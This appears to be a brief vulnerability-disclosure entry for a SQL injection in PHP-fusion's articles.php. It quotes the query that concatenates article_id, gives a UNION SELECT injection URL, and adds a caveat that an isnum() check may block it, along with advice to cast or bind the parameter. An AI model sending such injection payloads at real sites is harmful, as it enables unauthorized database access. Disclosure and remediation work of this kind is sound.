# Title : PHP-fusion (articles.php) SQL Injection Exploit
# platform : php
# Impact : Remote SQL Injection
# Tested on : Windows XP sp3
if (isset($_GET['article_id']) && isnum($_GET['article_id'])) {
$result = dbquery(
"SELECT ta.article_subject, ta.article_article, ta.article_breaks,
ta.article_datestamp, ta.article_reads, ta.article_allow_comments, ta.article_allow_ratings,
tac.article_cat_id, tac.article_cat_name,
tu.user_id, tu.user_name, tu.user_status
FROM ".DB_ARTICLES." ta
INNER JOIN ".DB_ARTICLE_CATS." tac ON ta.article_cat=tac.article_cat_id
LEFT JOIN ".DB_USERS." tu ON ta.article_name=tu.user_id
WHERE ".groupaccess('article_cat_access')." AND article_id='".$_GET['article_id']."' AND article_draft='0'"
);
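# Exploit :
# Note: in the excerpt above the query only runs when isnum($_GET['article_id']) is true. isnum() is not shown on this page; if it accepts digits only, the request below fails that check and never reaches dbquery(), so confirm the behaviour against the installed version before treating this as exploitable.
# Independently of the guard, article_id is concatenated into the SQL string; casting it to an integer or binding it as a parameter removes the reliance on that single check.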
http://[localhost]/[Path]/articles.php?article_id=-1+union+select+version()--